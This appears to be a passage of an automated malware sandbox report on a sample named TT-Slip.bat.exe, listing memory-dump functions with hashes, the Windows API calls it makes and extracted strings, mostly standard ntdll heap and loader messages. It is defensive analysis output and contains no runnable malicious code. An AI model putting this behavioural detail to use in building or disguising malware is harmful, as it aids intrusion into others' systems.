Instruction Fuzzy Hash: 6811CA72404280CFDB16CF00D9C4B16BF62FB94324F24C2A9DC494A656C33AE85ACBA2

Function 0086D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094411532.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_86d000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction ID: 47ae05e6a2f9e8bf187149aba1e65714a0aeeb89fe2ca526d96deef60fa062b0
Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction Fuzzy Hash: A711BB75A04780CFCB11CF14D5C4B15BBA2FB88314F24C6AAD8498B656C33AD80BCBA2

Function 0086D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094411532.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_86d000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction ID: 5be4653e1eeee22b1c4188f978a3c236c28d9d427b66ce6224f92c5abc999dc7
Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
Instruction Fuzzy Hash: E711BB75A04380DFCB12CF10D5D4B15BBA2FB84314F28C6A9D8498B796C33AE84ACB61

Non-executed Functions

Function 06B34308 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

k, xrefs: 06B34363

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID:
String ID: k
API String ID: 0-1742358602
Opcode ID: 0b57b63effb3eb17f35bb60177eef26d17d772dd328406c2a527cbdfe7b05b9c
Instruction ID: 177c13a0b685deb39214901dbd39b7e59137643473cad668e326d9799d37080e
Opcode Fuzzy Hash: 0b57b63effb3eb17f35bb60177eef26d17d772dd328406c2a527cbdfe7b05b9c
Instruction Fuzzy Hash: BCE10BB4E102298FCB54DFA9C5909AEFBF2FF89304F2481A9D454AB355D730A942CF61

Function 06B3B728 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57acd6d29516463bcae290ee88129eb993897daada472daa65476e7ec453809a
Instruction ID: b25059f6c4f9e8dac739bb161c331c7a4d5bef3df70e72ebf38dc5793e30e820
Opcode Fuzzy Hash: 57acd6d29516463bcae290ee88129eb993897daada472daa65476e7ec453809a
Instruction Fuzzy Hash: F3E178B1B017108FDBA9DB79C450BAEBBF6EF89300F1488A9D1468B295DF35E901CB51

Function 06B34740 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62bb25106647f8e614b88217cff3247d44a48d5ac547534a9abfaa33d54df4a6
Instruction ID: 6be86518e832ad8896dcc0c67a5bafdbb77007eb85c28c5e0f681022a17b6b78
Opcode Fuzzy Hash: 62bb25106647f8e614b88217cff3247d44a48d5ac547534a9abfaa33d54df4a6
Instruction Fuzzy Hash: 29E1FBB4E102198FCB54DFA9C5909AEFBF2FF89314F248169D414AB355D730A942CF61

Function 06B350F0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c411c75bcafad6b26c2b3ab1412aa458c550d32cc5c5aa8d3d0f97d745faac82
Instruction ID: e1a37407d79edf5b0b4cfa2554f7dc76ead79032d40ada2c4b16a5f56fa2e760
Opcode Fuzzy Hash: c411c75bcafad6b26c2b3ab1412aa458c550d32cc5c5aa8d3d0f97d745faac82
Instruction Fuzzy Hash: A2E11BB5E102298FCB24DFA8C5909AEFBF2FF89305F248169D415AB355D730A942CF61

Function 06B32C30 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57b2a7d19835915426694a6062ea5cfcde644bd8509503ab853be5317ea428bb
Instruction ID: c67e9f86a24568727f6b50ec35d5d0b126b6e629c258b22f48bdc470ee6e6d60
Opcode Fuzzy Hash: 57b2a7d19835915426694a6062ea5cfcde644bd8509503ab853be5317ea428bb
Instruction Fuzzy Hash: 64E11AB4E102298FCB54DFA8C5909AEFBF2FF89304F248169D414AB355D731A942CFA1

Function 06B33068 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58600c2a1c9dde577e5266fc932d7e8dc411ab6aec9355a560453ea8ed1dddde
Instruction ID: 41c32df8a599416eb20515e379bd2bc526c855353d7c3ffbe148d79a2b2acbb7
Opcode Fuzzy Hash: 58600c2a1c9dde577e5266fc932d7e8dc411ab6aec9355a560453ea8ed1dddde
Instruction Fuzzy Hash: CDE11AB4E102699FCB14DFA9C5909AEFBF2FF89304F248169D414AB315D731A942CFA1

Function 00B0D4FC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097631966.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a960a847bbdda4aabe32e0bdf0f1462e2037c8b0647913ba9854e2200748291
Instruction ID: 1af20bb90f2c2d4abbc0c661f2508e8eed401323d64299f7d47d816a25f77e0c
Opcode Fuzzy Hash: 2a960a847bbdda4aabe32e0bdf0f1462e2037c8b0647913ba9854e2200748291
Instruction Fuzzy Hash: F2A14E32F002068FCF15DFA4C8445AEBBF2FF85300B1585BAE905AB6A5DB71E956CB40

Analysis Process: TT-Slip.bat.exePID: 5788, Parent PID: 6412COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	4.5%
Signature Coverage:	7.1%
Total number of Nodes:	154
Total number of Limit Nodes:	13

Executed Functions

Function 00417933 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179A5

Memory Dump Source

Source File: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_TT-Slip.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: c839b24bd16572aed6a7051c7c2bbafa6a578f71075491fecf3231fa6de0353c
Instruction ID: cf70dd02b42f83f92b302e931271253000a32e180e5cfd414d045845ce8d9469
Opcode Fuzzy Hash: c839b24bd16572aed6a7051c7c2bbafa6a578f71075491fecf3231fa6de0353c
Instruction Fuzzy Hash: A3015EB1E5420DABDB10DBA5DC86FDEB3789B54304F0081AAE90897240F639EB588B95

Function 0042B543 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,0041656F,001F0001,?,00000000,?,?,00000104), ref: 0042B57A

Memory Dump Source

Source File: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_TT-Slip.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 5bf140ce2b7ee9b7289b441804a8eb77268ac8134a6b87ce6c3746fa3cd9d41f
Instruction ID: 937b2143e71a539af599f96f4abd8ce02b0dce4f2453741a7da5df85edb86ca1
Opcode Fuzzy Hash: 5bf140ce2b7ee9b7289b441804a8eb77268ac8134a6b87ce6c3746fa3cd9d41f
Instruction Fuzzy Hash: B1E086323006147BC610EA5ADC41F9B779CDFC5715F40841AFA0977181C771790187F5

Function 016D35C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 016D35CA

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6c43f64ee2cb80540d37f59dc510ecfb205e1d162f12ce7948337010f5abd823
Instruction ID: c0b37a149e9c0b9247451601b2fb4c6281ec8de63b7ad062405388ed698ba3bb
Opcode Fuzzy Hash: 6c43f64ee2cb80540d37f59dc510ecfb205e1d162f12ce7948337010f5abd823
Instruction Fuzzy Hash: 9590023160650402D100755C4918707104997D0201F65C511A4424A68EC7958A5166A2

Function 016D2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 016D2B6A

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ba9f0fcc7bc19f0458089a45cda1161002dd30b81ae155e293da09be22d61ad
Instruction ID: 7717d4a7af475cfb367eba90537a68cc4a00c137075e44ac92c6ad4b089dc974
Opcode Fuzzy Hash: 3ba9f0fcc7bc19f0458089a45cda1161002dd30b81ae155e293da09be22d61ad
Instruction Fuzzy Hash: 49900261203400034105755C4818617404E97E0201B55C121E5014A90EC52589916225

Function 016D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 016D2DFA

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7cea0886b692f664765ac71469c9d8494c71fabb930bb38183d12fa6bad13526
Instruction ID: 6ed4820aada1423bbf4f4f60d513ca7212ab44ff512a5394069aea06052cb639
Opcode Fuzzy Hash: 7cea0886b692f664765ac71469c9d8494c71fabb930bb38183d12fa6bad13526
Instruction Fuzzy Hash: 0D90023120240413D111755C4908707004D97D0241F95C512A4424A58ED6568A52A221

Function 016D2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 016D2C7A

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed9efaa1c8d3ac3407ac468c2208da610f02fb1f1333d04e92eb47bb83164ff9
Instruction ID: 288f8675e09a690ddc82b374e771f448b7ced65557117f7ad838067794e8dc42
Opcode Fuzzy Hash: ed9efaa1c8d3ac3407ac468c2208da610f02fb1f1333d04e92eb47bb83164ff9
Instruction Fuzzy Hash: 0290023120248802D110755C880874B004997D0301F59C511A8424B58EC69589917221

Function 00413E00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

66159w4, xrefs: 00413FAF, 00413FB9, 00413FCA
66159w4, xrefs: 00413FC1, 00413FC4

Memory Dump Source

Source File: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_TT-Slip.jbxd

Yara matches

Similarity

API ID:
String ID: 66159w4$66159w4
API String ID: 0-1576546964
Opcode ID: 38f054a78870f869ed828e8be13c9782f78306e7c6e2d5508bda4523ac360c5e
Instruction ID: ea6108b1436ed194fed4adbf68883a8af87e5b94fa50a412f37eaa4fea503ac8
Opcode Fuzzy Hash: 38f054a78870f869ed828e8be13c9782f78306e7c6e2d5508bda4523ac360c5e
Instruction Fuzzy Hash: 5831DE72A44308AAD7114EB9E885CEBBFF8AA4176271040CBF5448B352D6244F83CB94

Function 00413F3B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(66159w4,00000111,00000000,00000000), ref: 00413FBA

Strings

66159w4, xrefs: 00413FAF, 00413FB9, 00413FCA
66159w4, xrefs: 00413FC1, 00413FC4

Memory Dump Source

Source File: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_TT-Slip.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 66159w4$66159w4
API String ID: 1836367815-1576546964
Opcode ID: 7d27fbe7ccb01abb59a12a813e0ae5ed4f5f33e9c056934e58569f2ac88fd625
Instruction ID: 81527b3ea31c7f7c3721cf510f6ed77245fa7ad964fc8f5d8c7db5374fefc8ef
Opcode Fuzzy Hash: 7d27fbe7ccb01abb59a12a813e0ae5ed4f5f33e9c056934e58569f2ac88fd625
Instruction Fuzzy Hash: DA11E5B2D4021C7ADB11AAA19C82DEF7B7C9F41798F44806AF904A7241D6785E0687A1

Function 00413F43 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(66159w4,00000111,00000000,00000000), ref: 00413FBA

Strings

66159w4, xrefs: 00413FAF, 00413FB9, 00413FCA
66159w4, xrefs: 00413FC1, 00413FC4

Memory Dump Source

Source File: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_TT-Slip.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 66159w4$66159w4
API String ID: 1836367815-1576546964
Opcode ID: 96e0f7d925b9f8e80cb8809b958b2dc711033ba7514e0518aba4b15de443b2a7
Instruction ID: 5f87467ec1f60fc95d48d39a2a54b839da88c356cbad407cbbcfe12d7d50108c
Opcode Fuzzy Hash: 96e0f7d925b9f8e80cb8809b958b2dc711033ba7514e0518aba4b15de443b2a7
Instruction Fuzzy Hash: 280104B2D4021C7ADB10AAE19C82DEF7B7CDF41798F40802AFA0467241D67C5E0687B1

Function 0042B8B3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B8EF

Strings

fA, xrefs: 0042B8B6

Memory Dump Source

Source File: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_TT-Slip.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: fA
API String ID: 3298025750-3595381179
Opcode ID: b0092315f3663950749282f3922fd1a6698e08528b5ad2d216465ea922ad7804
Instruction ID: dfbb5c3547ebb858c08b1ac9d81141c24dd5f15d3fc1526cd94386d96c20186d
Opcode Fuzzy Hash: b0092315f3663950749282f3922fd1a6698e08528b5ad2d216465ea922ad7804
Instruction Fuzzy Hash: E5E06D713042087FDA14EE59DC41F9B73ACEFCA710F40001AFA08A7282CA70B910CBB9

Function 0042B863 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E15B,?,?,00000000,?,0041E15B,?,?,?), ref: 0042B89F

Memory Dump Source

Source File: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_TT-Slip.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0007e9899bb8d65442dd252decc12257072bc535ee3325ccaa2c241a00c20d8b
Instruction ID: 94be8940b4570a8ccafeb8e2c3bf58cee7564142d4f8afe53f0fb8bdc2f5dfe8
Opcode Fuzzy Hash: 0007e9899bb8d65442dd252decc12257072bc535ee3325ccaa2c241a00c20d8b
Instruction Fuzzy Hash: 0EE06DB23042047BCA10EE59EC41E9B73ADEFC5724F404019FD08A7281C771B910CBB9

Function 0042B903 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,52AC804A,?,?,52AC804A), ref: 0042B93A

Memory Dump Source

Source File: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_TT-Slip.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 670a3434f9ebf08651ab7438c8f745d2888e1581b7f8773cc8c952b12289d4fb
Instruction ID: 1635fe3acdd37ffb3153f7aed0ca08cc1fda1c62ea01f9124036e0877a845f8b
Opcode Fuzzy Hash: 670a3434f9ebf08651ab7438c8f745d2888e1581b7f8773cc8c952b12289d4fb
Instruction Fuzzy Hash: A6E086362402147BD620EA5AEC41F9B776CEFC5724F004119FA0867241C7717A0187F8

Function 016D2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 016D2C24

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7c0f213039a104e1e1568c6bc154d4a5b1874e273e67ef28718456ebb893e816
Instruction ID: ba76f9ab6ac0d39e23c2995f7bb9df5ffb78c63a8cf16095b39b44ae380ab899
Opcode Fuzzy Hash: 7c0f213039a104e1e1568c6bc154d4a5b1874e273e67ef28718456ebb893e816
Instruction Fuzzy Hash: 99B09B71D025C5C5DA52E7644E0C717794477D0701F15C165D2030751F4738C5D1E275

Non-executed Functions

Function 01712349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

DisableHeapLookaside, xrefs: 0171246D
ShutdownFlags, xrefs: 017124A1
GlobalFlag2, xrefs: 01712FC0
minkernel\ntdll\ldrinit.c, xrefs: 01713187
MaxLoaderThreads, xrefs: 017124EC
FrontEndHeapDebugOptions, xrefs: 01712489
@, xrefs: 01712942
CFGOptions, xrefs: 01712967
MinimumStackCommitInBytes, xrefs: 01712BB0
GlobalFlag, xrefs: 01712F3F, 01713059
RaiseExceptionOnPossibleDeadlock, xrefs: 01712579
LdrpInitializeExecutionOptions, xrefs: 0171317D
UseImpersonatedDeviceMap, xrefs: 0171251C
UnloadEventTraceDepth, xrefs: 017124C0
DisableExceptionChainValidation, xrefs: 0171275F
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01713176
ExecuteOptions, xrefs: 017125A0
MaxDeadActivationContexts, xrefs: 01712D82
TracingFlags, xrefs: 01712549
@, xrefs: 01712B74

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 29dc488e04adfd4febe926a518d43ba1d4bf61e866ff7755385c1165d9325dca
Instruction ID: aa9889d8c47b22913551357996b02baba02d8abd9f37ec9efc71c4392e746fcb
Opcode Fuzzy Hash: 29dc488e04adfd4febe926a518d43ba1d4bf61e866ff7755385c1165d9325dca
Instruction Fuzzy Hash: 2F929B71608342AFE721DE28CC80B6BF7E9BB84710F24492DFA95D7256D770E844CB96

Function 017412ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 017418A5
Free Heap block %p modified at %p after it was freed, xrefs: 0174171B
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 0174186B
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 017418F8
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 0174176D
Heap block at %p is not last block in segment (%p), xrefs: 017417B7
Heap block at %p has incorrect segment offset (%x), xrefs: 0174181A
HEAP: , xrefs: 01741706, 01741756, 017417A8, 01741809, 0174184D, 01741895, 017418E6
HEAP[%wZ]: , xrefs: 017416CD, 017416F9, 01741749, 0174179B, 017417FC, 01741840, 017418D9

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 3eb7421a2a4391e3b04e977b978b273fcb91c912c783c7247ea77dfc54d0a192
Instruction ID: 3f85b08f6973d4e20e183f90b12f00f1736022e5c789f119bb3bda77e930ef40
Opcode Fuzzy Hash: 3eb7421a2a4391e3b04e977b978b273fcb91c912c783c7247ea77dfc54d0a192
Instruction Fuzzy Hash: 38128C30600642DFEB26EF29C445BB6FBF6EF09714F588499E4968B652D734F880CB90

Function 0168D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 0168D3E9
Control Panel\Desktop\MuiCached, xrefs: 0168D62B
Control Panel\Desktop, xrefs: 0168D45D
@, xrefs: 0168D663
@, xrefs: 0168D49D
PreferredUILanguages, xrefs: 0168D4B8, 0168D4C5
PreferredUILanguagesPending, xrefs: 016EA8DE
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0168D3B6
MachinePreferredUILanguages, xrefs: 0168D685

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 20308ffd6229b1c5bc7d0c31f4cad2f1980d0bc795dda6032fc28e9fbaff47dc
Instruction ID: 3ab237fd81fab3ecb358fe0763f138e96e9d74d40a47b59feff82cad5ab3e7dc
Opcode Fuzzy Hash: 20308ffd6229b1c5bc7d0c31f4cad2f1980d0bc795dda6032fc28e9fbaff47dc
Instruction Fuzzy Hash: 26B1BF715093169FD711EFA8CC80A6BBBE8AF84744F014A2EF989D7380D770D945CBA2

Function 01729179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

%s\%ld\%s, xrefs: 0172948D
%s\%u-%u-%u-%u, xrefs: 01729422
\Sessions, xrefs: 01729488
Global\Session\%ld%s, xrefs: 017294C5
BaseNamedObjects, xrefs: 01729477, 0172947C
\AppContainerNamedObjects, xrefs: 017294AB, 017294B9
AppContainerNamedObjects, xrefs: 0172946E, 017294D6
\BaseNamedObjects, xrefs: 0172949E

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: 5800c6efeebac5112204719c578cfe344258b190b442833f6632f176bd3b94c3
Instruction ID: 25680ad5d0c04bc8d1936e873a0f08ae99ef95bf1208e6240677fbd4367ac2ca
Opcode Fuzzy Hash: 5800c6efeebac5112204719c578cfe344258b190b442833f6632f176bd3b94c3
Instruction Fuzzy Hash: A4D1B172804332ABD731DA54C840BABFBE8AF94718F48492DFB8497250D774CD46CB96

Function 01740274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to reallocate block at %p to %Ix bytes, xrefs: 017403BA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0174069F
RtlReAllocateHeap, xrefs: 017402BF, 01740362
Just reallocated block at %p to %Ix bytes, xrefs: 017405F1
HEAP: , xrefs: 017403A6, 017404B5, 017405DD, 01740682, 017406D9
HEAP[%wZ]: , xrefs: 01740399, 017404A8, 017405D0, 01740675, 017406CC
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 017404D3
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 017406EA

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: b6ab4884e6111d501aa1931de26579d9e06d1abdf0481de2daf73610ce4b206f
Instruction ID: c94804ea10fc84dbda0dc1b9f1451bb8b918d104a48dce887f55891e86f6fc0d
Opcode Fuzzy Hash: b6ab4884e6111d501aa1931de26579d9e06d1abdf0481de2daf73610ce4b206f
Instruction Fuzzy Hash: ECD1CE31600686DFDB22EF68C841AEDFBF2FF4A720F188149F6469B252C7749941CB55

Function 0168D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0168D2C3
@, xrefs: 0168D2AF
@, xrefs: 0168D0FD
